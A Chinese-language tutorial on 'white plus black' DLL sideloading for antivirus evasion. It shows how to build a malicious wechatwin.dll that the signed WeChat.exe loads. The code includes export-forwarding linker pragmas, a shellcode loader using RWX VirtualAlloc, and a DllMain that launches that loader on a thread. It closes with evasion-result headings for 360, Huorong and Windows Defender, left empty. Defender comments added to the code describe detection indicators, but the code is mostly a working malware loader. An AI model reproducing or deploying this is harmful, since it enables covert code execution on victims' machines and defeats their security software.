白加黑源码免杀学习


概述

白程序:WeChat.exe

恶意dll:wechatwin.dll

制作流程

  • 获取导出函数列表

    // MSVC linker directives: each symbol the host expects from this DLL is
    // re-exported by name and ordinal as a forwarder to the module "tmp3ACF"
    // (presumably the renamed original DLL — not shown on this page), so the
    // host resolves the same exports while this DLL's own entry point runs.
    // Defender note: a module whose entire export table is forwarders to a
    // sibling file next to a signed host binary is a sideloading indicator
    // worth alerting on in its own right.
    #pragma comment(linker, "/export:??0IChannelLogWriter@@QAE@$$QAV0@@Z=tmp3ACF.??0IChannelLogWriter@@QAE@$$QAV0@@Z,@1")
    #pragma comment(linker, "/export:??0IChannelLogWriter@@QAE@ABV0@@Z=tmp3ACF.??0IChannelLogWriter@@QAE@ABV0@@Z,@2")
    #pragma comment(linker, "/export:??0IChannelLogWriter@@QAE@XZ=tmp3ACF.??0IChannelLogWriter@@QAE@XZ,@3")
    #pragma comment(linker, "/export:??4IChannelLogWriter@@QAEAAV0@$$QAV0@@Z=tmp3ACF.??4IChannelLogWriter@@QAEAAV0@$$QAV0@@Z,@4")
    #pragma comment(linker, "/export:??4IChannelLogWriter@@QAEAAV0@ABV0@@Z=tmp3ACF.??4IChannelLogWriter@@QAEAAV0@ABV0@@Z,@5")
    #pragma comment(linker, "/export:??4ILogWriter@@QAEAAV0@$$QAV0@@Z=tmp3ACF.??4ILogWriter@@QAEAAV0@$$QAV0@@Z,@6")
    #pragma comment(linker, "/export:??4ILogWriter@@QAEAAV0@ABV0@@Z=tmp3ACF.??4ILogWriter@@QAEAAV0@ABV0@@Z,@7")
    #pragma comment(linker, "/export:??_7IChannelLogWriter@@6B@=tmp3ACF.??_7IChannelLogWriter@@6B@,@8")
    #pragma comment(linker, "/export:?AddExtraMem@TXBugReport@@YAHKI@Z=tmp3ACF.?AddExtraMem@TXBugReport@@YAHKI@Z,@9")
    #pragma comment(linker, "/export:?AddExtraMem@TXBugReport@@YAHPAXI@Z=tmp3ACF.?AddExtraMem@TXBugReport@@YAHPAXI@Z,@10")
    #pragma comment(linker, "/export:?AddIgnoreHookCheckModule@TXBugReport@@YAXPB_W@Z=tmp3ACF.?AddIgnoreHookCheckModule@TXBugReport@@YAXPB_W@Z,@11")
    #pragma comment(linker, "/export:?AddReleaseMonitorPoint@TXBugReport@@YAXPAJ@Z=tmp3ACF.?AddReleaseMonitorPoint@TXBugReport@@YAXPAJ@Z,@12")
    #pragma comment(linker, "/export:?DoBugReport@TXBugReport@@YAJPAU_EXCEPTION_POINTERS@@PB_W@Z=tmp3ACF.?DoBugReport@TXBugReport@@YAJPAU_EXCEPTION_POINTERS@@PB_W@Z,@13")
    #pragma comment(linker, "/export:?GetBugReportFlag@TXBugReport@@YAKXZ=tmp3ACF.?GetBugReportFlag@TXBugReport@@YAKXZ,@14")
    #pragma comment(linker, "/export:?GetBugReportInfo@TXBugReport@@YAPAUtagBugReportInfo@1@XZ=tmp3ACF.?GetBugReportInfo@TXBugReport@@YAPAUtagBugReportInfo@1@XZ,@15")
    #pragma comment(linker, "/export:?GetCustomFiltFunc@TXBugReport@@YAP6AHPAU_EXCEPTION_POINTERS@@@ZXZ=tmp3ACF.?GetCustomFiltFunc@TXBugReport@@YAP6AHPAU_EXCEPTION_POINTERS@@@ZXZ,@16")
    #pragma comment(linker, "/export:?InitBugReport@TXBugReport@@YAXPB_W000GGKHHKKP6GHPAUtagBugReportInfo@1@PBD200PAPAXPAKPAX@Z@Z=tmp3ACF.?InitBugReport@TXBugReport@@YAXPB_W000GGKHHKKP6GHPAUtagBugReportInfo@1@PBD200PAPAXPAKPAX@Z@Z,@17")
    #pragma comment(linker, "/export:?InitBugReportEx@TXBugReport@@YAXPB_W000GGKHHKKP6GHPAUtagBugReportInfo@1@PBD200PAPAXPAKPAX@ZH@Z=tmp3ACF.?InitBugReportEx@TXBugReport@@YAXPB_W000GGKHHKKP6GHPAUtagBugReportInfo@1@PBD200PAPAXPAKPAX@ZH@Z,@18")
    #pragma comment(linker, "/export:?RaiseSelfFatalException@TXBugReport@@YAXW4SelfException@1@@Z=tmp3ACF.?RaiseSelfFatalException@TXBugReport@@YAXW4SelfException@1@@Z,@19")
    #pragma comment(linker, "/export:?RecordCallStackIfNeed@TXBugReport@@YAXPAJ@Z=tmp3ACF.?RecordCallStackIfNeed@TXBugReport@@YAXPAJ@Z,@20")
    #pragma comment(linker, "/export:?SetBugReportFlag@TXBugReport@@YAHK@Z=tmp3ACF.?SetBugReportFlag@TXBugReport@@YAHK@Z,@21")
    #pragma comment(linker, "/export:?SetBugReportPath@TXBugReport@@YAHPB_W@Z=tmp3ACF.?SetBugReportPath@TXBugReport@@YAHPB_W@Z,@22")
    #pragma comment(linker, "/export:?SetBugReportUin@TXBugReport@@YAXKH@Z=tmp3ACF.?SetBugReportUin@TXBugReport@@YAXKH@Z,@23")
    #pragma comment(linker, "/export:?SetCustomFiltFunc@TXBugReport@@YAXP6AHPAU_EXCEPTION_POINTERS@@@Z@Z=tmp3ACF.?SetCustomFiltFunc@TXBugReport@@YAXP6AHPAU_EXCEPTION_POINTERS@@@Z@Z,@24")
    #pragma comment(linker, "/export:?SetExtInfo@TXBugReport@@YAHKKPB_W@Z=tmp3ACF.?SetExtInfo@TXBugReport@@YAHKKPB_W@Z,@25")
    #pragma comment(linker, "/export:?SetExtRptFilePath@TXBugReport@@YAHPB_W0@Z=tmp3ACF.?SetExtRptFilePath@TXBugReport@@YAHPB_W0@Z,@26")
    #pragma comment(linker, "/export:?SetLogFileMd5Dir@TXBugReport@@YAHPB_W00@Z=tmp3ACF.?SetLogFileMd5Dir@TXBugReport@@YAHPB_W00@Z,@27")
    #pragma comment(linker, "/export:?UninitBugReport@TXBugReport@@YAXXZ=tmp3ACF.?UninitBugReport@TXBugReport@@YAXXZ,@28")
    #pragma comment(linker, "/export:?ValidateBugReport@TXBugReport@@YAXXZ=tmp3ACF.?ValidateBugReport@TXBugReport@@YAXXZ,@29")
    #pragma comment(linker, "/export:?pfPostBugReport@TXBugReport@@3P6AXXZA=tmp3ACF.?pfPostBugReport@TXBugReport@@3P6AXXZA,@30")
    #pragma comment(linker, "/export:?pfPreBugReport@TXBugReport@@3P6AXXZA=tmp3ACF.?pfPreBugReport@TXBugReport@@3P6AXXZA,@31")
    #pragma comment(linker, "/export:SignWith3Des=tmp3ACF.SignWith3Des,@32")
    #pragma comment(linker, "/export:StartWachat=tmp3ACF.StartWachat,@33")
    #pragma comment(linker, "/export:_TlsGetData@12=tmp3ACF._TlsGetData@12,@34")
    #pragma comment(linker, "/export:_TlsStoreData@12=tmp3ACF._TlsStoreData@12,@35")
    #pragma comment(linker, "/export:__ASSERT=tmp3ACF.__ASSERT,@36")
    
  • shellcode写入内存加载

    // Thread entry point (CreateThread signature; pPara is unused) that copies
    // the `shellcode` buffer into a fresh executable allocation and jumps to it.
    // NOTE(review): `shellcode`, `first` and `a` are not defined on this page,
    // so their sizes and contents cannot be checked here.
    // Defender note: a private RWX allocation (PAGE_EXECUTE_READWRITE) followed
    // by a memcpy into it and an indirect call to its base is the classic
    // in-memory loader shape that EDR memory scanners and API telemetry key on;
    // the new thread's start address lies inside a DLL loaded next to a signed
    // host, which is the "white + black" sideloading pattern this page describes.
    DWORD WINAPI jmp_shellcode(LPVOID pPara)
    {
    	// Writable and executable at once; the return value is never checked,
    	// so a failed allocation (NULL) is passed straight to memcpy below.
    	void* exec = VirtualAlloc(0, sizeof(shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    	// Overwrites the first two bytes and the two bytes at offset 834 of the
    	// buffer in place before it is copied; what `first` and `a` hold is not
    	// shown on this page.
    	memcpy(shellcode, first, 2);
    	memcpy(shellcode + 834, a, 2);
    	memcpy(exec, shellcode, sizeof shellcode);
    	// Transfers control to the copied bytes; `return 0` is reached only if
    	// the payload returns.
    	((void(*)())exec)();
    	return 0;
    }
    
  • DllMain执行jmp_shellcode

    // DLL entry point. On DLL_PROCESS_ATTACH it starts jmp_shellcode on a new
    // thread and immediately closes the handle, so nothing ever waits on the
    // thread and the payload runs concurrently with the host's startup; the
    // other reasons are no-ops. Always returns TRUE, so the load never fails.
    // Defender note: thread creation from inside DllMain (i.e. under the loader
    // lock) whose start address is in a just-loaded DLL beside a signed host is
    // a strong sideloading indicator; the only work this DLL does itself is the
    // thread launch, everything else is forwarded via the /export pragmas above.
    BOOL WINAPI
    DllMain(HANDLE hDll, DWORD dwReason, LPVOID lpReserved)
    {
    
    	HANDLE threadHandle;
    
    	switch (dwReason)
    	{
    	case DLL_PROCESS_ATTACH:
    
    		// Create a thread and close the handle as we do not want to use it to wait for it 
    		// (the CreateThread result is not checked; a NULL handle would be passed to CloseHandle)
    
    		threadHandle = CreateThread(NULL, 0, jmp_shellcode, NULL, 0, NULL);
    		CloseHandle(threadHandle);
    
    		break;
    
    	case DLL_PROCESS_DETACH:
    		// Code to run when the DLL is freed
    		break;
    
    	case DLL_THREAD_ATTACH:
    		// Code to run when a thread is created during the DLL's lifetime
    		break;
    
    	case DLL_THREAD_DETACH:
    		// Code to run when a thread ends normally.
    		break;
    	}
    	return TRUE;
    }
    

免杀效果:

360安全卫士(360安全大脑)

版本:

效果:

360杀毒、火绒

Windows Defender

